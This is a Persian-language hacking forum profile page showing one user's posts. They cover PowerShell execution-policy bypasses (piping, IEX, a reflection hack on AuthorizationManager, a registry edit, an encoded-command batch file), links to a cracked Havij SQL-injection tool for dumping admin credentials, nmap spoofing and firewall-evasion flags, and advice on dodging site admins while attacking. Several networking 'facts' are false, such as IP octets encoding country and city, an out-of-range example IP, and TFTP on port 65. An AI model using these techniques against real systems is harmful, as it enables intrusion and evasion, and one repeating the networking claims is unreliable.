ts icon
سرور تیم اسپیک گاردایران

H.R.X

کاربر تازه وارد
  • تعداد ارسال ها

    14
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    2

آخرین بار برد H.R.X در 14 آبان 1398

H.R.X یکی از رکورد داران بیشترین تعداد پسند مطالب است !

درباره H.R.X

  • درجه
    1
  • تاریخ تولد 23 دی 1376

روش های تماس

  • Yahoo
    hrxhrx50@gmail.com

اطلاعات فردی

  • محل سکونت
    تبریز
  • جنسیت
    آقا

آخرین بازدید کنندگان نمایه

699 بازدید کننده نمایه
  1. بررسی policy ها در powershell و روش های دور زدن آنها همون طور که می دونید در powershell به جهت جلوگیری از اجرا شدن اسکریپت های خطرناک و جلوگیری از دسترسی های راه دور و … مایکروسافت یک سری محدودیت ها و policy ها تعریف کرده که می توان توسط کاربر تنظیم شود . این محدودیت ها در سطوح محتلف کاربری اعمال می شود. جهت تعریف این policy ها می توانیم از فرمان Set-ExecutionPolicy در powershell استفاده کنیم . با استفاده از این فرمان می توانیم تعیین کنیم که آیا کاربران در گروه های کاربری مختلف حق اجرای اسکریپت را دارند یا خیر ؟ این فرمان دارای چند نوع مجوز است. Restricted : که اجازه اجرای اسکریپت را به طور کل به هیچ کاربری نمی دهد AllSigned : تنها اسکریپت هایی که دارای امضای یک ناشر مورد اعتماد شرکت مایکروسافت قابل اجرا است. RemoteSigned : تنها اسکریپت هایی که دارای امضای دیجیتالی قابل اعتماد در سطح اینترنت است قابل اجرا است. Unrestricted : تمامی اسکریپت ها قابل اجرا می باشد فقط قبل از اجرای یگ اسکریپت در سطح اینترنت از شما سوال پرسیده می شود . Bypass : همه ی اسکریپت ها قابل اجرا می باشد و هیچ سوالی هم پرسیده نمی شود Undefined : جهت حذف سیاست های امنیتی بالا مورد استفاده قرار می گیرد شما می توانید با استفاده از فرمان زیر سیاست های بالا را اعمال کنید. Set-ExecutionPolicy Restricted که باعث جلوگیری از اجرای اسکریپت توسط کار بر می شود Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Restricted همچنین می توان بر روی یک دامنه ی زیر این محدودیت ها را اعمال کرد. MachinePolicyUserPolicyProcess CurrentUser LocalMachine در نهایت جهت دیدن لیستی از سیاست های امنیتی بر روی دامنه ها را با استفاده از فرمان زیر مشاهده کنید . PS C:\Users\Administrator> Get-ExecutionPolicy -List | Format-Table -AutoSize Scope ExecutionPolicy --------------- ----- MachinePolicy Undefined UserPolicy Undefined Process Undefined CurrentUser Unrestricted LocalMachine Unrestricted خوب حالا ما با استفاده از فرمان بالا اجرای اسکریپت را در سطح حساب کاربریمان می بندیم و سپس به شما نشان می دهیم که چگونه می توان آن محدودیت ها را دور زد . و اسکریپت خود را اجرا نمود . اول از همه یک فرمان ۲ خطی می نویسیم و آن را با پسوند PS1 ذخیره می کنیم به عنوان مثال فرمان Write-Host “BYPASSED” calc.exe حال اگر بخواهیم در حالت عادی آن را اجزا کنیم با خطای زیر مواجه می شویم. PS C:\test> .\a.PS1 .\a.PS1 : File C:\test\a.PS1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170. At line:1 char:1 + .\a.PS1 + ~~~~~~~ + CategoryInfo : SecurityError: (:) [], PSSecurityException + FullyQualifiedErrorId : UnauthorizedAccess روش های زیر جهت دور زدن سیاست های امنیتی در پاورشل ویندوز است. PS C:\test> Get-Content .\a.PS1 | PowerShell.exe -noprofile - BYPASSED PS C:\test> و PS C:\test> get-content .\a.PS1 | powershell.exe - bypassed PS C:\test> و همچنین نقطه مقابل دستور get-content در CDM که دستور Type می باشد. PS C:\test> TYPE .\a.ps1 | PowerShell.exe -noprofile - bypassed PS C:\test> همپنین می توان با استفاده از فرمان invoke-expression و pipline به گونه ای دیگر دستور را فراخوانی کرد. PS C:\test> Get-Content .\a.PS1 | Invoke-Expression bypassed PS C:\test> TYPE .\a.ps1 | Invoke-Expression bypassed می توان از کلمه ی اختصاصی فرامین نیز استفاده کرد Get-content = GC Invoke-expression = IEX PS C:\test> GC .\a.PS1 | iex bypassed می توان به خود فرمان ExecutionPolicy گفت که این یک فایل را در نظر نگیر PS C:\test> PowerShell.exe -ExecutionPolicy Bypass -File .\a.PS1 bypassed و یا خیر بگوییم سطح دسترسی را برای این فایل تغییر بده PowerShell.exe -ExecutionPolicy UnRestricted -File .\a.ps1 bypassed همچنین می توان با فراخوانی توابع بدون استفاده از تابع AuthorizationManager نیز این کار را انجام داد برای اینکار می توانید داخل profile های powershell یک تابع با نام دلخواه انتخاب کنید که من این جا نام آنرا d-exe می زاریم function D-Exe {> ($ ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,").setvalue($ctx, (new- object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell")) } و سپس می توان فایل را اجرا کنید . PS C:\test>D-exe .\a.PS1 bypassed همچنین می توان با تغییر در رجیستری این کار را انجام داد HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShellExecutionPolicy و می توانید مقدار ExecutionPolicy را به مقدار Unrestricted را تغییر داد .و در نهایت فایل را مستقیم به صورت معمولی انجام داد . PS C:\test>.\a.PS1 bypassed همچنین می توانید از طریق CMD هم سویچ کنید به powershell و اسکریپت داخل آن را اجرا کنید کافیست یک فایل Bat ایجاد کنید و در آن کد زیر را کپی نمایید . @echo off REM: Bypass.bat REM: cmd /C a.bat a.ps1 powershell.exe -noprofile -Command "powershell.exe -noprofile -encodedCommand ([Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes((gc %1 |%%{$_}|out- string))))" و سپس در cmd فرمان زیر را وارد کنید. a.bat a.ps1 و می بینید که کد اجرا می شود . یعنی در اصل ما توانستیم با استفاده از فرامین مختلف policy مربوط به powershell که توسط فرمان Set-executionpolicy انجام می شود را دوز بزنیم و فایل و یا اسکریپت خود را اجرا کنیم . امیدوارم مفید بوده باشد .
  2. H.R.X

    اولین تجربه هک یا امنیتتون؟!؟

    هک کردن وایفای
  3. :IP IP: هر سیستمی به هر روشی که به اینترنت وصل بشه یک IP اختصاصی از ISP خودش میگیره تمامی این آی پی ها از شرکت IANA آمریکا که شرکتی است که به تمای دنیا آی پی میفروشه (چون مال شرکت آمریکاست تمامی آی پی های رند رو برای خودش نگه می داره) دوتا سایت وجود داره که شما می تونید IP کشور های مختلف رو بررسی قرار دهید. nirsoft.net dnsstuff.com برای اینکه IP خودمون رو بدست بیاریم (IP valed) کافیه در گوگل عبارت IP Address رو سرچ کنیم مثال 2.196.70.36 اما برای بدست آوردن آی IP invaled کافیه در محیط ران (فشار دارد همزمان کلیک های windows+R) عبارت cmd را تایپ کنید و اینتر سپس در محیط ران عبارت ipconfig را تایپ کنید و اینتر مثال 169.264.240.116 (که آی پی اینولید به کار هکر ها نمیاد مهم آی پی ولید شماست) این IP بعد از هر (.) یکه معنی خاصی داره: عدد اول (2): نشان دهده کشور شماست عدد دوم (196): نشان دهده شهر شماست عدد سوم (70): نشان دهده منطقه شماست عدد آخر (36): نشان دهنده isp شماست که از چه isp استفاده میکنید ISP: isp (مخفف internet service provider) یا ارائه دهنده خدمات اینترنتی سازمان یا شرکتی است که به کاربران امکان اتصال به اینترنت و استفاده از آن را می دهد. درواقع میتوان به آن واسطه میان کاربر و اینترنت گفت. آی پی ها برای مشخص کردن مکان شما هم هستند (خیلی از هکر ها که بعد از عملیات نفوذ دستگیر میشن بخاطر لو رفتن همین IP می باشد) آی پی ها در کل دونمونه هستند. IPv4 IPv6 IPv6 فعلا خیلی کمه و به خیلی از کشور ها هنوز داده نشده آی پی های ورژن 6 رو جایگزین آی پی های ورژن 4 می کنه میشه گفت دلیل اومد IPv6 بخاطر تموم شدن IPV4 بوده که هم امنیت بیشتری داره هم گستردکی بیشتری داره چون ترکیبی از حروف و اعداد میباشد. NAT: امنیت دنیای شبکه ای که اینترنت هست رو تامین میکنه کار nat اینکه میاد این امکان را فراهم میکنه که تمامی کامپیوتر هایی که درون یک شبکه هستند رو به وسیله IP invaled وصل میکنه. اما از کجا بفهمیم ما پشت nat قرار گرفته ایم؟ درصورتی که آی پی ipaddress ما با آی پی ipconfig ما فرق داشت یعنی ما پشت nat قرار گرفته ایم امنیت آی پی به دو نوع است: SSL IPSEC SSL بر روی یک سایت برای امنیت مشتری اون سایت میباشد مثل بانک ها ایمیل ها و ... که دو نوع هسند پولی و رایگان IPSEC که سیستمی میباشد میاد تمام پکت هایی که ارسال یا دریافت میکنه رو رمزنگاری میکند. مخفی کردن آی پی از دست هکر ها: RUN=> mmc=> ok=> File=> Add/Remove Snap-in...=> IP Security Policy Management=>Add=>IP(...)=>Finish=>ok=>Save در صفحه ران mmc را تایپ کنید و ok سپس در پنجره بازشده سربرگ File را انتخاب و گزینه Add/Remove Snap-in را انتخاب نمایید. در پنجره باز شده IP Security Policy Management را پیدا کرده و کلیک کنید و سپس گزینه Add را کلیک کنید. در پنجر باز شده IP خود را معرفی کنید سپس گزینه Finish را انتخاب کنید و در پایان گزینه ok را انتخاب و save نمایید
  4. :PORT ما کلا 65535 تا پورت دارم که دو نوع هستند TCP و UDP پورت های TCP بیشتر استفاده میشن و بیشتر در دنیای انفورماتیک و کامپیوتر و هکرها هم خیلی استفاده میکنن که مهم ترین آنها: FTP:21 SSH:22 TELNET:23 SMB:445 DNS SERVICE:53 HTTP:80 HTTPS:443 POP3:110 MSSQL:1434 MYSQL:3306 IMAP:143 که پورت های مهم TCP این ها هستند که خیلی کم پیش میاد تا از پورت های دیگه ای استفاده کنیم اما کسایی که پورت های بیشتری بشناسن مخصوصا در زمینه دور زدن فایرفال خیلی به کارشون میاد. اما پورت های مهم UDP که ما باهاشون سرکار داریم و حداقل باید این پورت ها رو برای هکینگ بشناسیم: TFTP:65 SNMP:161 DNS QUERY:53 PORT چیست؟ درگاهی ورودی و خروجی است. هر چیزی که وارد یا خارج می شود مثل( نور.هوا.سیگنال و...) تفاوت اصلی بین TCP و UDP: TCP نسبت به UDP سرعت پایین تر و امنیت بالاتر داره اما UDP نسبت به TCP سرعت بالاتر و امنیت کمتری داره و کلیه کامپیوتر ها که با TCP کار میکنند 3 تا پکت ارسال و دریافت میکنند ACK و SYN و ACK AYN اما در UDP کلا 2 تا پکت ارسال و دریافت می کنند که هکر به راحتی میتونه هک کنه تفاوت اصلی بین FTP و TFTP: هر دوتا برای انتقال فایل ها استفاده می شن با این تفاوت که FTP برای هر عملیات نیاز به Password و user داره در صورتی که TFTP نداره که هکر به راحتی میتونه هک کنه پورت های مهم شبکه: از 1 تا 1024 پورت های تصادفی: از 1025 تا 49151 ( مورد علاقه هکرها ) پورت های خالی و کلاس آزاد: از 45152 تا 65535 توجه: وقتی میخواهید یک سایتی رو بزنید سعی کنین از از پورت های تصادفی استفاده کنید هم راحته هم احتمال شناسایی توسط ادمین سایت کمه اما اگه از پورت های مهم شبکه برنین وقتی ادمین میاد چک میکنه و میتونه ببینه
  5. :IP IP: هر سیستمی به هر روشی که به اینترنت وصل بشه یک IP اختصاصی از ISP خودش میگیره تمامی این آی پی ها از شرکت IANA آمریکا که شرکتی است که به تمای دنیا آی پی میفروشه (چون مال شرکت آمریکاست تمامی آی پی های رند رو برای خودش نگه می داره) دوتا سایت وجود داره که شما می تونید IP کشور های مختلف رو بررسی قرار دهید. nirsoft.net dnsstuff.com برای اینکه IP خودمون رو بدست بیاریم (IP valed) کافیه در گوگل عبارت IP Address رو سرچ کنیم مثال 2.196.70.36 اما برای بدست آوردن آی IP invaled کافیه در محیط ران (فشار دارد همزمان کلیک های windows+R) عبارت cmd را تایپ کنید و اینتر سپس در محیط ران عبارت ipconfig را تایپ کنید و اینتر مثال 169.264.240.116 (که آی پی اینولید به کار هکر ها نمیاد مهم آی پی ولید شماست) این IP بعد از هر (.) یکه معنی خاصی داره: عدد اول (2): نشان دهده کشور شماست عدد دوم (196): نشان دهده شهر شماست عدد سوم (70): نشان دهده منطقه شماست عدد آخر (36): نشان دهنده isp شماست که از چه isp استفاده میکنید ISP: isp (مخفف internet service provider) یا ارائه دهنده خدمات اینترنتی سازمان یا شرکتی است که به کاربران امکان اتصال به اینترنت و استفاده از آن را می دهد. درواقع میتوان به آن واسطه میان کاربر و اینترنت گفت. آی پی ها برای مشخص کردن مکان شما هم هستند (خیلی از هکر ها که بعد از عملیات نفوذ دستگیر میشن بخاطر لو رفتن همین IP می باشد) آی پی ها در کل دونمونه هستند. IPv4 IPv6 IPv6 فعلا خیلی کمه و به خیلی از کشور ها هنوز داده نشده آی پی های ورژن 6 رو جایگزین آی پی های ورژن 4 می کنه میشه گفت دلیل اومد IPv6 بخاطر تموم شدن IPV4 بوده که هم امنیت بیشتری داره هم گستردکی بیشتری داره چون ترکیبی از حروف و اعداد میباشد. NAT: امنیت دنیای شبکه ای که اینترنت هست رو تامین میکنه کار nat اینکه میاد این امکان را فراهم میکنه که تمامی کامپیوتر هایی که درون یک شبکه هستند رو به وسیله IP invaled وصل میکنه. اما از کجا بفهمیم ما پشت nat قرار گرفته ایم؟ درصورتی که آی پی ipaddress ما با آی پی ipconfig ما فرق داشت یعنی ما پشت nat قرار گرفته ایم امنیت آی پی به دو نوع است: SSL IPSEC SSL بر روی یک سایت برای امنیت مشتری اون سایت میباشد مثل بانک ها ایمیل ها و ... که دو نوع هسند پولی و رایگان IPSEC که سیستمی میباشد میاد تمام پکت هایی که ارسال یا دریافت میکنه رو رمزنگاری میکند. مخفی کردن آی پی از دست هکر ها: RUN=> mmc=> ok=> File=> Add/Remove Snap-in...=> IP Security Policy Management=>Add=>IP(...)=>Finish=>ok=>Save در صفحه ران mmc را تایپ کنید و ok سپس در پنجره بازشده سربرگ File را انتخاب و گزینه Add/Remove Snap-in را انتخاب نمایید. در پنجره باز شده IP Security Policy Management را پیدا کرده و کلیک کنید و سپس گزینه Add را کلیک کنید. در پنجر باز شده IP خود را معرفی کنید سپس گزینه Finish را انتخاب کنید و در پایان گزینه ok را انتخاب و save نمایید این پست رو هم مثل network و port سعی کردم مختصر و مفید باشه اگه ناقص یا ایرادی داشت لطفا بگین تا برطرف کنیم تا استفاده لازمه رو ببریم فقط دوستان از سایت های دیگه کپی رایت نکنید چیزی که خودتون بلد هستین. باتشکر
  6. H.R.X

    Android Data Recovery Pro

    یه نرم افزاری هس به اسم Disk Digger pro که بسیار قدرتمند هستش که لینک دانلودشو قرار میدم DiskDigger-Pro(H.R.X).apk اینم لینک اسکن شدش https://virusscan.jotti.org/en-US/filescanjob/inil3o7v8b پس از دانلود و نصب و اجازه دسترسی دادن بر روی STRT BASIC PHOTO SCAN کلیک کنید بعد مدتی تمامی عکس های حذف شده رو میاره حتی قدیمی هارو انتخابشون کنین و RECOVER رو کلیک کنید بعد گزینه ...Seve the رو بزنین و محل ذخیره رو مشخص کنید و تمام
  7. H.R.X

    PORT

    :PORT ما کلا 65535 تا پورت دارم که دو نوع هستند TCP و UDP پورت های TCP بیشتر استفاده میشن و بیشتر در دنیای انفورماتیک و کامپیوتر و هکرها هم خیلی استفاده میکنن که مهم ترین آنها: FTP:21 SSH:22 TELNET:23 SMB:445 DNS SERVICE:53 HTTP:80 HTTPS:443 POP3:110 MSSQL:1434 MYSQL:3306 IMAP:143 که پورت های مهم TCP این ها هستند که خیلی کم پیش میاد تا از پورت های دیگه ای استفاده کنیم اما کسایی که پورت های بیشتری بشناسن مخصوصا در زمینه دور زدن فایرفال خیلی به کارشون میاد. اما پورت های مهم UDP که ما باهاشون سرکار داریم و حداقل باید این پورت ها رو برای هکینگ بشناسیم: TFTP:65 SNMP:161 DNS QUERY:53 PORT چیست؟ درگاهی ورودی و خروجی است. هر چیزی که وارد یا خارج می شود مثل( نور.هوا.سیگنال و...) تفاوت اصلی بین TCP و UDP: TCP نسبت به UDP سرعت پایین تر و امنیت بالاتر داره اما UDP نسبت به TCP سرعت بالاتر و امنیت کمتری داره و کلیه کامپیوتر ها که با TCP کار میکنند 3 تا پکت ارسال و دریافت میکنند ACK و SYN و ACK AYN اما در UDP کلا 2 تا پکت ارسال و دریافت می کنند که هکر به راحتی میتونه هک کنه تفاوت اصلی بین FTP و TFTP: هر دوتا برای انتقال فایل ها استفاده می شن با این تفاوت که FTP برای هر عملیات نیاز به Password و user داره در صورتی که TFTP نداره که هکر به راحتی میتونه هک کنه پورت های مهم شبکه: از 1 تا 1024 پورت های تصادفی: از 1025 تا 49151 ( مورد علاقه هکرها ) پورت های خالی و کلاس آزاد: از 45152 تا 65535 توجه: وقتی میخواهید یک سایتی رو بزنید سعی کنین از از پورت های تصادفی استفاده کنید هم راحته هم احتمال شناسایی توسط ادمین سایت کمه اما اگه از پورت های مهم شبکه برنین وقتی ادمین میاد چک میکنه و میتونه ببینه دوستان این پست رو هم مثل Network خواستم تا حد امکان مختصر و مفید باشه حالا اگه کم و کسری یا ناقصی داره بگید تا اصلاحش کنیم و استفاده لازمه رو ببریم فقط دوستان خواهشا از سایت های دیگه کپی رایت نکنین چیزی رو که خودتون بلد هستین. باتشکر
  8. H.R.X

    چی شد که هکر شدین؟

    سلام به دوستان عزیز و خسته نباشید . من تو روستا بزرگ شدم متولد 1376 هستم اما برخلاف بقیه دهه هفتادی ها. حالا به علت مشکلات مالی خانوادگی و مکانی با امکانات دهه 50 , 60 بزرگ شدم که این باعث میشه از لحاظ تکلنوژی نسبت به بقیه افراد عقب بمونم تا اینکه وقتی حدود 12,13 سالم بود پدرم یک کامپیوتر قدیمی دست دوم XP از رفیقش که دیگه لازمش نداشت به قیمت 50 هزار تومن خرید اولین بارم بود که اسم کامپیوتر رو میشنیدم و این برام تعجب اور بود حدود چند ماه باهاش ور رفتم اون موقع تو روستامون یه مغازه CD فروشی بود که فیلم اجاره میداد. که همیشه ازش فیلم اجاره میکردم یه روز شانسی از لیست فیلم ها فیلمی رو انتخاب کردم که حتی معنی اسمش رو هم نمیدونستم فقط میخواستم فیلمی باشه که سرگرمم کنه اسمش Hacker 1995 بود خلاصه اجارش کردمو اوردم نشستم به دیدنش توی فیلم اون پسره با کامپیوتر کارایی میکرد که برای من جذاب بود مثل هک کردن سیستم های مدرسشون یا هک کردن ابر رایانه های یک شرکت و... که برام خیلی جذاب بود. بچه بودم دیگه دوست داشتم مثل اون پسره بشم از اون موقع به بعد افتادم دنبال این کار تو اینترنت تحقیق میکردم فیلم هایی با ژانر هکری اجاره میکردم بعد ها پکیچ های آموزشی تو اینترنت پیدا میکردم شروع میکرم به یاد گرفتن تا اینکه کارم کشید به اینجا...
  9. Network هفت لایه استاندارد Network که اصطلاحا بهش میگن OSI LAYERS 1-Phisical Layer لایه فیزیکی: این نوع لایه میاد زبان بیس کامپیوتر رو بیان می کند زبان پایه ای اسمبلی همون کد های صفر و یک 2-Data Link Layer لایه ارتباط داده ها: مکانیزم کشف و کنترل خطاها از این لایه سرچشمه می گیره و کار این لایه خطایابی است 3-Network Layer لایه شبکه ای: این لایه وظیفه جابه جایی اطلاعات رو داره و ارتباط مستقیم با لایه Data Link Layers داره چون برای تحویل اطلاعات امن به این لایه نیاز دارد. تمامی config فایرفایل توی این لایه انجام میشه و هکر ها از این لایه برای دور زدن فایرفایل استفاده میکنند. 4-Trans Port Layer لایه انتقال: این برخلاف لایه Network Layers هکرها این لایه رو خیلی دوست دارن و کارش شباهت بیشتری به لایه Network Layers دارد اما جابه جایی مطمن تر که مهتری زیرمجموع آن PORT UDP,TCP IP ICMP PING هکر ها از طریق IP ها و PORT ها عملیات نفوذ انجام می دهند اما با استفاده از PING آی پی و پورت هارا بدست می آورند 5-Session Layer لایه نشست یا جلسه: برقراری یک نشست بین دو یا چند کامپیوتر به صورت ریموت بر عهده داره درواقع نشت رو مدیریت می کنه Remote Desktop 6-Presntation Layer لایه نمایش: فشرده سازی رمزنگاری و رمزگشایی و داده ها و کدها رو به صورت گرافیکی نشون میده 7-Application Layer لایه کاربردی: وظیفه مدیریت داده ها و شبکه و انتقال صفحات وب رو داره دسترسی به بانک اطلاعاتی به صورت ریموت هم میده تا حد امکان خواستم این پست مختصر و مفید باشه اگه ناقضی داره لطفا شما اصلاحش کنید تا ما هم استفاده لازمه رو ببریم فقط خواهشا از مطالب سایت های دیگه کپی رایت نکنید فقط چیزی که بلدید و یادگرفتید. باتشکر
  10. رتبه هکر های ایران در جهان 2018 در این گزارش که توسط شرکت امنیت سایبری CrowdStrike منتشر شده <زمان شکست> اشاره به زمانی دارد که مهاجمان برای عبور از سیستم ها در یک شبکه پس از دسترسی پیدا کردن به آن دارند در این دوره زمانی هکرها می توانند بدافزارها را در سیستم هدف پیاده سازی کرده و داده ها را سرقت کنند. این زمان برای سازمان هم اهمیت دارد چرا که باید بتوانند با سرعت هر چه بیشتر و پیش از آلوده شدن تمام سیستم ها آلودگی ها را تشخیص داده و کامپیوتر های هک شده را از دیگر کامپیوترها ایزوله کنند. CrowdStrike آمار خود را بر اساس بررسی های 30 هزار تلاش برای نفوذ دسته بندی کرده در صدر لیست گروه هایی که گفته می شود مربوط به روسیه (با علامت خرس در جدول) باشند به چشم میخورند در ادامه نام Collima (اسب پرنده افسانه ای چینی) برای کشور کره شمالی و خرس پاندا برای کشور چین دیده می شود. در رتبه چهارم ایران با گربه قرار گرفته و در نهایت به رتبه های بعدی مجرمان سایبری با نام عنکبوت اشاره شده است.
  11. H.R.X

    دانلود نرم افزار Havij

    شرمنده حل شد اسکنشون کردم و لینک های اسکن رو قرار دادم شرمنده شب بود اصلا حواسم نبود ممنون که یاداوری کردید☺️
  12. Havij v1.16 Pro.exeHavij-1.152-pro cracked.rar نسخه Havij 1.152 فایل نصب شده می باشد مناسب برای کسایی که مشکل Error دارن معرفی ابزار havij: یک برنامه تزریق داده بصورت خودکار است که بع متخصصین امنیت و تست نفوذ یاری می کند تا اسیب پذیری های تزیق کد پایگاه داده را بصورت کامل بهره برداری کنند. به وسیله ابزار هویج می توانیم وب اپلیکشین های آسیب پذیر را که پایگاه داده ای زیر دارند مورد تست نفوذ تزریق کد از مرورگر قرار داد: MySql- Oracle- PostgreSQL- Sybase- MSAcess- MsSql- با استفاده از این برنامه کاربر می تواند پایگاه داده متصل به وب اپلیکیشن آسیب پذیر را شناسایی کند.کلیه اطلاعات دیتابیس اعم از اخبار کاربران مخصوصا مدیران و پسورد های هش شده و ساده دیتابیس را واکشی کند ویژگی های مهم هویج: - نمایش اطلاعات پایگاه داده - export جداول پایگاه داده و نمایش داده های درون هر جدول مربوطه - جستجو از پایگاه های مختلف برای یافتن مقدار کرک شده ی هش بدست آمده MD5 - قابلیت پیدا کردن صفحات ورود مدیریت برای تست رمز بدست آمده - قابلیت تزریق کدهای پایگاه داده های مختلف نظیر: Blind , Union Based , Error Based , Time Based فایل اسکن شده Havij v1.16 Pro.exe https://virusscan.jotti.org/en-US/filescanjob/vzi3p9yiyb فایل اسکن شده Havij-v1.152-Pro-cracked.rar https://virusscan.jotti.org/en-US/filescanjob/hs19drdid0
  13. در Port Scaning برای پیداکردن پورت از IP شما به تارگ پکت های پی در پی میفرستد که اگر فایرفایل سایت فعال باشد به علت پکت های پی در پی شمارا به عنوان هکر شناسایی میکند و IP شمارا مسدود میکند. (همانطور که میدانید این اسکنر را با نرم افزار nmap انجام می دهیم.) جهت اسکنر و جلوگیری از مسدود شدن IP کد های زیر را اجرا نمایید... برای پورت های تی سی پی nmap -vv -A -S -f -p1_65535 google.com برای پورت های یو دی بی nmap -vv -A -S -f -p U:1_65535 google.com توجه: بجای آدرس سایت میتوانید از IP هم استفاده کنید توضیحات v- سرعت کار رو میبره بالا vv- سرعت کار رو خیلی میبره بالا A- نوع سیستم عامل رو پیدا میکنه p- پیدا کردن پورت S- اسپوف میکنه ( یعنی میاد آی پی شمارو مخفی میکنه ) f- فایرفایل رو دور میزنه ( پکت هارا تک تک و پراکنده میفرسته تا فایرفال نتونه شناسایی کنه) باتشکر